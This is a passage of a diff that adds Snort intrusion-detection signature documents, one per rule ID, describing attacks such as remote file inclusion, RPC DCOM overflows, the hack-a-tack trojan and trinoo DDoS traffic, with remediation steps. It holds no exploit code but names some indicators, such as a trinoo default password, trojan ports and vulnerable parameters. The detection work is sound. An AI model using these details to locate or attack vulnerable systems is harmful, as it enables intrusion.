+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1146.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1146
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/298.txt
@@ -0,0 +1,60 @@
+SID:
+298
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/678.txt
@@ -0,0 +1,79 @@
+Rule:  
+
+--
+Sid: 
+678
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_sp_da-di_8nas.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1696.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1696
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000714.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000714
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "view.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "view.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1666.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1666
+
+--
+Summary:
+This event is generated when a webserver returns a directory listing of
+it's cgi-bin.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when a webserver returns a directory listing of
+it's cgi-bin. The scripts listed may be valuable to an attacker when
+planning further attacks against the webserver. It may also be possible
+for the attacker to download the contents of the cgi-bin and view the
+contents of the script sources.
+
+--
+Affected Systems:
+	All web server platforms.
+
+--
+Attack Scenarios:
+An attacker can list the contents of the cgi-bin, discover the filename
+of a vulnerable script and use the information to execute an exploit
+against the server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow directory content listing of the cgi-bin.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/541.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 541
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/987.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+987
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of an Active Server Page (ASP) using a malformed HTR request. 
+
+--
+Impact:
+Information gathering.  Fragments of the source code of an ASP may be returned possibly disclosing sensitive information.
+
+--
+Detailed Information:
+HTR is an older scripting language still supported by Internet Information Service (IIS).  HTR requests are preocessed by ISM.DLL that improperly evaluates malformed HTR requests.  This may disclose parts of the source code associated with a .asp file referenced in the request. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can craft a malformed request to disclose source code possibly revealing sensitive information. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0063
+
+Bugtraq
+http://www.securityfocus.com/bid/1488
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-031.asp
+
+--
--- /dev/null
+++ b/doc/signatures/100000570.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000570
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_change_pwd.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_change_pwd.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2992.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2992
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2471.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2471
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/1107.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1107
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3429.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3429
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1892.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1892
+
+--
+Summary:
+This event is generated when SNMP communications contain a NULL value 
+the authentication string.
+
+--
+Impact:
+Medium to Serious. Depending on if the community string was for 
+read-only, read-create or read-write an attacker could gain a varying 
+level of access to a system.
+
+--
+Detailed Information:
+An SNMP community string is the authentication process that a host 
+running SNMP uses to grant access.
+
+--
+Affected Systems:
+Numerous. Routers, switches, servers, NAS systems, many others.
+
+--
+Attack Scenarios:
+An attacker can launch a scan of all network attached devices looking 
+for port 161 (UDP) and then attempt to gain access using SNMP.
+
+--
+Ease of Attack:
+Simple. There are many free SNMP "tree walking" programs, an example of 
+such is getIF.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure that all devices that have SNMP turned on have complex 
+passwords assigned.
+
+Disable unneeded WRITE / CREATE community strings.
+
+Since SNMP traffic is not encrypted, use a packet filtering firewall to 
+restrict SNMP communications to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+GetIF:
+http://www.wtcs.org/snmp4tpc/getif.htm
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
--- /dev/null
+++ b/doc/signatures/614.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+614
+
+--
+Summary:
+hack-a-tack is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the hack-a-tack server to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	141	HackAttack 1.20 Connect
+	614	hack-a-tack attempt
+
+This Trojan is commonly used to install other Trojan programs.
+
+The server portion opens TCP ports 31785 and 31787 and UDP ports 31789 and 31791 by default to establish a connection between client and server. The ports may then be configured by the attacker to use something other than these defaults.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Expl32.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Explorer32 ="<drive>:\windows\Expl32.exe"
+	Configuration Wizard = "<drive>:\windows=cfgwiz32.exe"
+
+Removal of this entry is required.
+
+Delete the file(s) <drive>:\WINDOWS\Expl32.exe and <drive>:\windows=cfgwiz32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS314
+http://www.whitehats.com/info/IDS504
+
+Hackfix.org
+http://www.hackfix.org/miscfix/hackatack.shtml
+
+Commodon Communications
+http://www.commodon.com/threat/threat-hack.htm
+
+--
--- /dev/null
+++ b/doc/signatures/3110.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3110
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1761.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1761
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+IDS system on the protected network is detected.
+
+--
+Impact:
+These tools may be used to compromise data on the network or may
+indicate mis-use of other IDS systems.
+
+--
+Detailed Information:
+This event indicates the use of an IDS tool. The source of the event
+should be investigated carefully. These tools may be used to gather data
+present in traffic on the protected network.
+
+--
+Affected Systems:
+	All networks.
+
+--
+Attack Scenarios:
+An unathorized user could use an IDS to gather data and observe traffic
+present on the network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3248.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3248
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/237.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+237
+
+--
+Summary:
+This event is generated when a trinoo DDoS master host communicates with a daemon host.
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a trinoo master. If the listed destination IP is in your network, it may be a trinoo daemon.
+
+--
+Detailed Information:
+The trinoo DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Masters communicate with daemons to direct them to launch attacks.  A master may communicate with a daemon via UDP destination port 27444 with a string of "l44adsl" in the payload.  This string is the default password for the daemon.
+
+--
+Affected Systems:
+Any trinoo compromised host.
+
+--
+Attack Scenarios:
+A trinoo master will communicate with a daemon to direct it to launch attacks.
+
+--
+Ease of Attack:
+Simple. trinoo code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html#trinoo
+
+Arachnids:
+http://www.whitehats.com/info/IDS197
+
+--
--- /dev/null
+++ b/doc/signatures/890.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+890
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2535.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2535
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
